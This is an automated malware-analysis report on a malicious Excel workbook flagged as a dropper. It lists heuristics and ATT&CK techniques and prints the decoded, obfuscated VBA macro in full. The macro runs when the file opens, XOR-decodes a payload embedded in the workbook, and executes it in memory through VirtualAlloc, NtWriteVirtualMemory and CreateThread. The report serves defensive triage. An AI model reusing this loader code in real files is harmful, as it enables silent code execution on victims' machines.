MALICIOUS
138
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains both Excel 4.0 (XLM) macros and VBA macros, with the VBA macros referencing Windows API functions like VirtualAlloc and CreateThread. This suggests the sample is designed to allocate memory and execute code, likely a second-stage payload. The ClamAV detection as 'Xls.Dropper.Agent-6335064-0' further supports its role as a dropper.
Heuristics 7
-
ClamAV: Xls.Dropper.Agent-6335064-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-6335064-0
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() IqQsCEAqnVJvCzh -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value |
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4736 bytes |
SHA-256: 332c7c5f127fe66c698aaca2ebf7970e4db8479c9065d639909eb60860dfefba |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
37 of 71 identifiers look randomly generated (e.g. 'hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlno') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As LongPtr, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As LongPtr
Private Declare PtrSafe Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As LongPtr, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As LongPtr, ByVal DUIVFNJyRUxiZCpoON As LongPtr, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As LongPtr, ByRef VOkqzIImxNVKafXh As LongPtr) As LongPtr
#Else
Private Declare Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As Long, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As Long
Private Declare Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As Long, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As Long, ByVal DUIVFNJyRUxiZCpoON As Long, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As Long, ByRef VOkqzIImxNVKafXh As Long) As Long
#End If
Const dLWCyrKSc = &H1000
Const HvZmRoFmIemsxuAH = &H40
Public Sub IqQsCEAqnVJvCzh()
Dim VHDDGQOIvEcHoVWuIzFyrUkgHrPU() As Byte
VHDDGQOIvEcHoVWuIzFyrUkgHrPU = vDRyoSBQHkkAjoWoXGTsfLvd(ActiveWorkbook.FullName)
Dim JgJdiSVLOQRBiXYCScsYpN As String
JgJdiSVLOQRBiXYCScsYpN = StrConv(VHDDGQOIvEcHoVWuIzFyrUkgHrPU, 64)
Dim TIEawx
TIEawx = Split(JgJdiSVLOQRBiXYCScsYpN, "hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlnovWpmVQWRNctXsXybhDUDajLUqLRpmWiCFIDAQJTTQCmhslqSdNgRqKolkvWkZHFQUQsJuXkyKbMxXEBeuYmyPrlVurqvNIUjWvmBSHyfCHgpXQoFTRPaugbDFxocHPLbgCBCrZmNAhVhkWXEdKBVT")
Dim oaUYMytDfdbIUJOXjXmDOpxVvVd As String
Dim BmDubhXpZ As String
Dim MuzsiYOcKJKiNouLDnIHufF As String
BmDubhXpZ = StrConv(StrConv(TIEawx(UBound(TIEawx)), 64), 128)
MuzsiYOcKJKiNouLDnIHufF = Mid$(BmDubhXpZ, 3, Len(BmDubhXpZ))
oaUYMytDfdbIUJOXjXmDOpxVvVd = vculRliv("PPtJWvtvyNWfiupLoTFcAnlTtJz", MuzsiYOcKJKiNouLDnIHufF)
#If VBA7 Then
Dim pZIQFpHF As LongPtr
Dim MLXTRqqLZIyRutlLQG As LongPtr
#Else
Dim pZIQFpHF As Long
Dim MLXTRqqLZIyRutlLQG As Long
#End If
pZIQFpHF = PWUFrFPWzTDZatGuCMUnsLK(0, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), dLWCyrKSc, HvZmRoFmIemsxuAH)
MLXTRqqLZIyRutlLQG = NtWriteVirtualMemory(-1, pZIQFpHF, oaUYMytDfdbIUJOXjXmDOpxVvVd, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), 0)
MLXTRqqLZIyRutlLQG = KbwwMGLUx(0, 0, pZIQFpHF, 0, 0, 0)
End Sub
Public Function vDRyoSBQHkkAjoWoXGTsfLvd(ByVal TgYDYCQuD As String) As Byte()
Dim BmDubhXpZ As Long
Dim MuzsiYOcKJKiNouLDnIHufF() As Byte
BmDubhXpZ = FreeFile
If LenB(Dir(TgYDYCQuD)) Then
Open TgYDYCQuD For Binary Access Read As BmDubhXpZ
ReDim MuzsiYOcKJKiNouLDnIHufF(LOF(BmDubhXpZ) - 1&) As Byte
Get BmDubhXpZ, , MuzsiYOcKJKiNouLDnIHufF
Close BmDubhXpZ
Else
Err.Raise 53
End If
vDRyoSBQHkkAjoWoXGTsfLvd = MuzsiYOcKJKiNouLDnIHufF
Erase MuzsiYOcKJKiNouLDnIHufF
End Function
Public Sub Document_Open()
IqQsCEAqnVJvCzh
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function vculRliv(rxyGGuaONJUytyo As String, qEJGr As String) As String
Dim GPtXgEDlzBoMv As Long
Dim VeWTITGwLHbDflAGyPeaRJnIo As String
Dim lCjskHdyelHQYyL As Integer, wIkxhYSyhCu As Integer, a As Long
For GPtXgEDlzBoMv = 1 To Len(qEJGr)
a = GPtXgEDlzBoMv Mod Len(rxyGGuaONJUytyo)
If a = 0 Then a = Len(rxyGGuaONJUytyo)
lCjskHdyelHQYyL = Asc(Mid$(qEJGr, GPtXgEDlzBoMv, 1))
wIkxhYSyhCu = Asc(Mid$(rxyGGuaONJUytyo, a, 1))
VeWTITGwLHbDflAGyPeaRJnIo = VeWTITGwLHbDflAGyPeaRJnIo + Chr(lCjskHdyelHQYyL Xor wIkxhYSyhCu)
Next GPtXgEDlzBoMv
vculRliv = VeWTITGwLHbDflAGyPeaRJnIo
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.